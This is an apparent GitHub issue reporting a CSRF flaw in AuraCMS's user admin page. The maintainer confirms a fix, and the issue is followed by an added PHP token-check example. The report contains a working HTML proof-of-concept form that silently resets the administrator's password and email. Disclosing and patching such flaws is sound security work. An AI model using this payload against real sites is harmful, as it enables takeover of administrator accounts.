auracms / AuraCMS

Indonesia Content Management System
http://auracms.org

Cross-site request forgery in admin page #2

Open FuryKangaroo opened 6 years ago

FuryKangaroo commented 6 years ago

There is a cross-site request forgery vulnerability in admin.php?mod=users. It can change the administrator's password.

First: After the administrator has logged in, open the PoC page. Aura.txt to Aura.html --> change administrator's password.

Second: Check the results after modifying the password.

Success!

CSRF PoC: Aura.txt

<html>
  <!--POC-->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/test/06AuraCMS-master/admin.php?mod=users&action=edit&id=1&referer=%2Ftest%2F06AuraCMS-master%2Fadmin.php%3Fmod%3Dusers" 
    method="POST" enctype="multipart/form-data">
      <input type="hidden" name="username" value="user" />
      <input type="hidden" name="password" value="user1234" />
      <input type="hidden" name="email" value="user&#64;qq&#46;com" />
      <input type="hidden" name="name" value="Administrator" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

auracms commented 6 years ago

Thanks, I have fixed this!
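
A session-bound token check that would reject the forged POST from the PoC above, shown as an added example; it is not AuraCMS code and not the maintainer's actual fix. The function names and the `csrf_token` field name are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not AuraCMS code; all names below are hypothetical.

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every state-changing admin form. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

/** True only when the submitted token matches the session's token. */
function csrf_check(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

/** Call at the top of the handler, before any user record is modified. */
function require_csrf(array $server, array $post, array $session): void
{
    if (($server['REQUEST_METHOD'] ?? '') === 'POST' && !csrf_check($post, $session)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// Constructed offline demo: $session stands in for $_SESSION after session_start().
$session = [];
$token = csrf_token($session);
// Fields as sent by the PoC form: a cross-site page cannot read the token.
$forged = ['username' => 'user', 'password' => 'user1234', 'submit' => ''];
$legit = $forged + ['csrf_token' => $token];
var_dump(csrf_check($forged, $session));  // forged request
var_dump(csrf_check($legit, $session));   // form rendered by the admin page
```

In a real handler the arguments would be `$_SERVER`, `$_POST` and `$_SESSION`, with `require_csrf()` called before the user-edit logic runs.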